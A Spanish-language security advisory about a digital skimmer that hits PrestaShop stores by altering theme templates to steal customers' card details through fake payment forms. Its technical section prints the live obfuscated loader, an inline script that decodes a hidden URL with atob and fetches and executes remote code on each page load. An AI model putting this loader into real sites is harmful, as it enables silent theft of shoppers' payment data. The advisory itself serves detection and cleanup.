Alerta de seguridad: Detectado «Digital Skimmer» en tiendas PrestaShop

Recientemente hemos identificado una amenaza de seguridad crítica que afecta al ecosistema PrestaShop. Se trata de un malicious script (conocido como «digital skimmer») diseñado para interceptar y robar la información de pago de tus clientes de manera silenciosa.

¿Cómo funciona este ataque exactamente?

Este malware no bloquea tu web, sino que actúa como un parásito en el proceso de pago. Su funcionamiento se basa en el engaño visual:

• Sustitución de botones: El script reemplaza los botones de pago legítimos de tu tienda por unos fraudulentos.
• Redirección maliciosa: Cuando el cliente hace clic para pagar, es enviado a un formulario externo falso que imita a una pasarela bancaria real.
• Robo de datos: El cliente introduce los datos de su tarjeta pensando que está en un entorno seguro, pero la información se envía directamente al servidor del atacante.

Análisis técnico: ¿Dónde se esconde?

El código malicioso se inserta directamente en el archivo _partials/head.tpl del tema activo de la tienda. Esto indica que el atacante ha logrado modificar archivos internos del servidor. El fragmento de código detectado es el siguiente:

<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

Este script utiliza la función atob para ocultar una URL maliciosa y descargar el código dañino en tiempo real cada vez que un usuario visita la tienda.

Riesgos para los clientes y el negocio

El impacto de este «skimming» digital es extremadamente grave:

• Robo de identidad financiera: Los atacantes obtienen el número de tarjeta, CVV y fecha de caducidad.
• Cargos fraudulentos: Los clientes sufrirán compras no autorizadas en sus cuentas.
• Pérdida de reputación: Tu tienda puede ser marcada como «no segura» por navegadores y entidades bancarias, destruyendo la confianza de tus compradores.
• Responsabilidad legal: Podrías enfrentarte a sanciones por brechas de seguridad en el tratamiento de datos sensibles (RGPD).

Versiones afectadas

Esta amenaza no depende de una versión específica de PrestaShop. Afecta a cualquier tienda (v1.7, v8.x, etc.) donde el atacante haya podido entrar debido a:

• Módulos de terceros desactualizados o vulnerables.
• Contraseñas de FTP o de administración débiles.
• Permisos de archivos configurados incorrectamente en el hosting.

¿Necesitas ayuda para limpiar tu tienda o realizar una auditoría de seguridad? Contacta con nuestro equipo técnico de inmediato.